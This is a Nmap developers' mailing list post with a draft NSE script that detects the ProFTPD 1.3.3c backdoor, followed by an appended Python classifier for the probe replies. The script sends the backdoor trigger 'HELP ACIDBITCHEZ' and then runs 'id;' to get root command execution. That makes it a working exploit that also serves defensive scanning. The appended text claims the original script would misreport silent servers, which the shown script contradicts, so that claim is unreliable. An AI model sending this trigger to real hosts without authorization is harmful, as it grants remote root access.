Nmap Development mailing list archives
Re: [NSE] Detection of ProFTPD backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Tue, 7 Dec 2010 15:22:49 +0100
Hello,

*** Mak Kolybabi <mak () kolybabi com> wrote:

> I've attached a script to detect the ProFTPD backdoor. I submit it here for (hopefully) inclusion into Nmap. I have tested it both on a backdoored, and a non-backdoored version of ProFTPD 1.3.3c. Comments, concerns, criticism, and testing are appreciated.
Doesn't work for me. See "http://pastebin.com/us4RebQP".

I played around a little and got the following working. It is _not_ a finished script, just an example.

###############################################
require "shortport"
require "stdnse"   -- needed for stdnse.print_debug / stdnse.format_output

portrule = shortport.port_or_service(21, "ftp")

local CMD_FTP = "HELP ACIDBITCHEZ"
local CMD_SHELL = "id"

action = function(host, port)
  local socket = nmap.new_socket()
  local result
  local status = true
  local err_catch = function()
    socket:close()
  end
  local try = nmap.new_try(err_catch)

  socket:set_timeout(10000)
  try(socket:connect(host, port))

  -- Banner check: only ProFTPD 1.3.3c is known to carry the backdoor.
  status, result = socket:receive_lines(1)
  if not (status and result:match("ProFTPD 1.3.3c")) then
    stdnse.print_debug(1, "This version is not known to be backdoored.")
    return
  end

  try(socket:send(CMD_FTP .. "\r\n"))
  status, result = socket:receive_lines(1)
  stdnse.print_debug(1, "Answer (help) is %s", result)
  -- Vulnerable = TIMEOUT, Not Vulnerable = 502 Unknown command 'ACIDBITCHEZ'

  try(socket:send(CMD_SHELL .. ";\r\n"))
  status, result = socket:receive_lines(1)
  stdnse.print_debug(1, "Answer (id;) is %s", result)
  -- Vulnerable = uid=0(root) gid=0(root)..., Not Vulnerable = 500 ID; not understood

  -- Only report when the reply actually looks like shell output, not a 500 error.
  if not (status and result:match("uid=")) then
    stdnse.print_debug(1, "No shell output received; not reporting.")
    return
  end

  local results = {
    "This installation has been backdoored.",
    "Command: " .. CMD_SHELL,
    "Results: " .. result
  }
  return stdnse.format_output(true, results)
end
###############################################

See "http://pastebin.com/QsBRNrdp".

Handle with care, I have no experience in writing NSE scripts. ;)

Micha

--
Michael Meyer
OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460
Managing directors: Lukas Grunwald, Dr. Jan-Oliver Wagner

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
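The script above relies on three observations (the banner, the reply to the HELP trigger, and the reply to the follow-up command), and the comments in it describe what each reply looks like on a clean versus a backdoored server, but the decision logic itself is spread over the network code. The following is an added example, not code from the thread or from Nmap, that isolates that decision into a pure function so it can be checked against constructed replies without touching a server. The return labels ("not-applicable", "clean", "backdoored", "inconclusive") and the sample banners are assumptions made for this illustration; the reply strings are the ones quoted in the script's comments. Unlike the script, it treats a bare timeout on the HELP trigger as inconclusive rather than as proof, and only reports "backdoored" when the second reply actually carries id-style output.

```python
import re

# Version string the thread identifies as the only known backdoored release.
VULNERABLE_BANNER = re.compile(r"ProFTPD 1\.3\.3c")
# Shape of the reply the script's comment describes for a backdoored server:
# "uid=0(root) gid=0(root) ...". Any uid/gid pair counts, not only root.
ID_OUTPUT = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+")


def classify(banner, help_reply, cmd_reply):
    """Classify one probe session from its three observed replies.

    banner     -- first line received after connect (or None on timeout)
    help_reply -- reply to the HELP trigger (None means the read timed out)
    cmd_reply  -- reply to the follow-up 'id;' command (None on timeout)
    Returns one of: 'not-applicable', 'clean', 'backdoored', 'inconclusive'.
    """
    # Version gate: anything that is not 1.3.3c is out of scope for this check.
    if not VULNERABLE_BANNER.search(banner or ""):
        return "not-applicable"

    # A normal FTP daemon rejects the unknown HELP argument with a 502.
    if help_reply is not None and help_reply.startswith("502"):
        return "clean"

    # Positive evidence: the second reply is shell output, not an FTP status line.
    if cmd_reply is not None and ID_OUTPUT.search(cmd_reply):
        return "backdoored"

    # Negative evidence: the daemon parsed 'id;' as a (bad) FTP command.
    if cmd_reply is not None and cmd_reply.startswith("500"):
        return "clean"

    # Timeouts on both replies, or anything unexpected, is not proof either way.
    return "inconclusive"


# Constructed sample sessions (not captured from any real host).
SAMPLE_SESSIONS = {
    "backdoored": (
        "220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.0.2.10]",
        None,                                      # HELP trigger timed out
        "uid=0(root) gid=0(root) groups=0(root)",  # shell output came back
    ),
    "clean": (
        "220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.0.2.11]",
        "502 Unknown command 'ACIDBITCHEZ'",
        "500 ID; not understood",
    ),
    "other-version": (
        "220 ProFTPD 1.3.3a Server (ProFTPD Default Installation) [192.0.2.12]",
        None,
        None,
    ),
    "silent": (
        "220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.0.2.13]",
        None,
        None,
    ),
}


def classify_all(sessions=SAMPLE_SESSIONS):
    """Classify every sample session; returns {name: verdict}."""
    return {name: classify(*replies) for name, replies in sessions.items()}


if __name__ == "__main__":
    for name, verdict in classify_all().items():
        print(f"{name:14s} -> {verdict}")
```

Feeding the constructed sessions through `classify_all()` yields "backdoored", "clean", "not-applicable" and "inconclusive" respectively; the last case is the one the original script would have misreported, since it returns the "backdoored" result table whenever the banner matches.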
Current thread:
- [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 10)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 11)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 12)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 13)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 29)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)